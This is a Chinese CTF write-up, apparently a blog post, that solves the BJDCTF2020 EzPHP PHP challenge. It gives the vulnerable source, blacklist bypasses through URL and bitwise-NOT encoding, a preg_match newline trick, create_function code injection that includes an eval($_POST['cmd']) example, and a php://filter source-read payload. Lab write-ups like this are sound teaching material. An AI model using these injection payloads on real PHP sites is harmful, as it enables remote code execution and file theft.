[BJDCTF2020]EzPHP
参考wp:[BJDCTF 2020] EzPHP (超详细)_A丶R的博客-CSDN博客
打开之后并没有发现什么东西f12查看源码发现了
base32解密得
直接url访问/1nD3x.php得到了源码
<?php
highlight_file(__FILE__);
error_reporting(0);
$file = "1nD3x.php";
$shana = $_GET['shana'];
$passwd = $_GET['passwd'];
$arg = '';
$code = '';
echo "<br /><font color=red><B>This is a very simple challenge and if you solve it I will give you a flag. Good Luck!</B><br></font>";
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
} ?>
This is a very simple challenge and if you solve it I will give you a flag. Good Luck!
Aqua is the cutest five-year-old child in the world! Isn't it ?一、
if($_SERVER) {
if (
preg_match('/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i', $_SERVER['QUERY_STRING'])
)
die('You seem to want to do something bad?');
}黑名单中过滤的东西,$_SERVER[‘QUERY_STRING’]在读取url的时候不会对url进行解码,而$_GET['x']是会对url进行解码的,所以我们要把出现在黑名单中的需要用得到的字符进行url编码后再上传
二、
if (!preg_match('/http|https/i', $_GET['file'])) {
if (preg_match('/^aqua_is_cute$/', $_GET['debu']) && $_GET['debu'] !== 'aqua_is_cute') {
$file = $_GET["file"];
echo "Neeeeee! Good Job!<br>";
}
} else die('fxck you! What do you want to do ?!');preg_match('/^aqua_is_cute$/', $_GET['debu'])要求debu的值满足/^aqua_is_cute$/,但是$_GET['debu'] !== 'aqua_is_cute'则需要满足debu不能强等于'aqua_is_cute',这里需要用到preg_match漏洞进行绕过,可以用换行符绕过,即在结尾街上%0a(换行符)进行绕过,同时还要通过url编码绕过黑名单,构造payload:deb%75=aq%75a_is_c%75te%0a(%75即小写字母u)
三、
if($_REQUEST) {
foreach($_REQUEST as $value) {
if(preg_match('/[a-zA-Z]/i', $value))
die('fxck you! I hate English!');
}
}$_REQUEST包括所有以post和get方式传入的变量,如果含有字母则无法通过,但是构造参数的话不可能没有字母。这里的绕过利用到了$_REQUEST的特性,变量post值会优先于get,所以我们可以在get传入变量后用post传入数字进行覆盖。
四、
if (file_get_contents($file) !== 'debu_debu_aqua')
die("Aqua is the cutest five-year-old child in the world! Isn't it ?<br>");这里file_get_contents可以读取文件内容,但是我们无法找到内容为‘debu_debu_aqua’的文件进行读取,并且黑名单还过滤了http和https等协议,也无法远程包含,这里使用data协议绕过,仍然还是要绕过黑名单,构造payload:file=data://text/plain,deb%75_deb%75_aq%75a
五、
if ( sha1($shana) === sha1($passwd) && $shana != $passwd ){
extract($_GET["flag"]);
echo "Very good! you know my password. But what is flag?<br>";
} else{
die("fxck you! you don't know my password! And you don't know sha1! why you come here!");
}强比较,这里可以通过数组绕过,构造payload:sh%61na[]=1&p%61sswd[]=2(%61为小写字母a)
六、
if(preg_match('/^[a-z0-9]*$/isD', $code) ||
preg_match('/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&|\$|\*|\||\<|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i', $arg) ) {
die("<br />Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w=");
} else {
include "flag.php";
$code('', $arg);
} ?>这里我不是很懂,大佬说这里存在create_function()注入,而create_function()存在两个参数$args和$code,用于创建一个lambda样式的函数,首先可以用create_function()先创建一个简单的函数
<?php
$afunc = create_function('$a, $b','return ($a+$b);');
echo $afunc(1,2);
?>上面的函数等价于
<?php
function afunc($a,$b)
{
return $a+$b;
}
echo afunc(1,2);
?>由于$code参数可控,可能会存在代码注入
<?php
$aFunc = create_function('$a, $b','return($a+$b);}eval($_POST['cmd']);//');
function aFunc($a,$b)
{
return $a+$b;
}
eval($_POST['cmd']);
?>而本题的$code('', $arg);中可以通过控制$arg来进行代码注入,首先保证传入的$code为create_function,其次是$arg参数,这里过滤了flag、cat等关键字,无法直接得到flag,这里用get_defined_vars()直接输出所有变量,构造payload:fl%61g[c%6de]=create_function&fl%61g[%61rg]=}var_dump(get_defined_vars());//(%6为小写字母o)
至此满足了所有的if最后的payload为:
http://98e838c9-3694-4ff7-b270-cbc0f67106b4.node4.buuoj.cn:81/1nD3x.php
?deb%75=aq%75a_is_c%75te%0a
&file=data://text/plain,deb%75_deb%75_aq%75a
&sh%61na[]=1&p%61sswd[]=2
&fl%61g[c%6fde]=create_function
&fl%61g[%61rg]=}var_dump(get_defined_vars());//但是也要传入debu=1&file=1
得到了一张图片和大量的代码串
最后一句话["ffffffff11111114ggggg"]=> string(89) "Baka, do you think it's so easy to get my flag? I hid the real flag in rea1fl4g.php 23333"告诉我们flag在rea1fl4g.php中,url直接访问rea1fl4g.php
通过源码猜测flag就在源码之中,读取源码用到php://filter伪协议,构造payload:require(php://filter/read=convert.base64-encode/resource=rea1fl4g.php);因为前面过滤了很多的关键词,所以对整个require中的内容进行一个取反
<?php
$a="php://filter/read=convert.base64-encode/resource=rea1fl4g.php";
echo urlencode(~$a);
?>运行得到%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F
构造payload:fl%61g[%61rg]=}require(~(%8F%97%8F%C5%D0%D0%99%96%93%8B%9A%8D%D0%8D%9A%9E%9B%C2%9C%90%91%89%9A%8D%8B%D1%9D%9E%8C%9A%C9%CB%D2%9A%91%9C%90%9B%9A%D0%8D%9A%8C%90%8A%8D%9C%9A%C2%8D%9A%9E%CE%99%93%CB%98%D1%8F%97%8F));//
base64解密可得flag
610
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
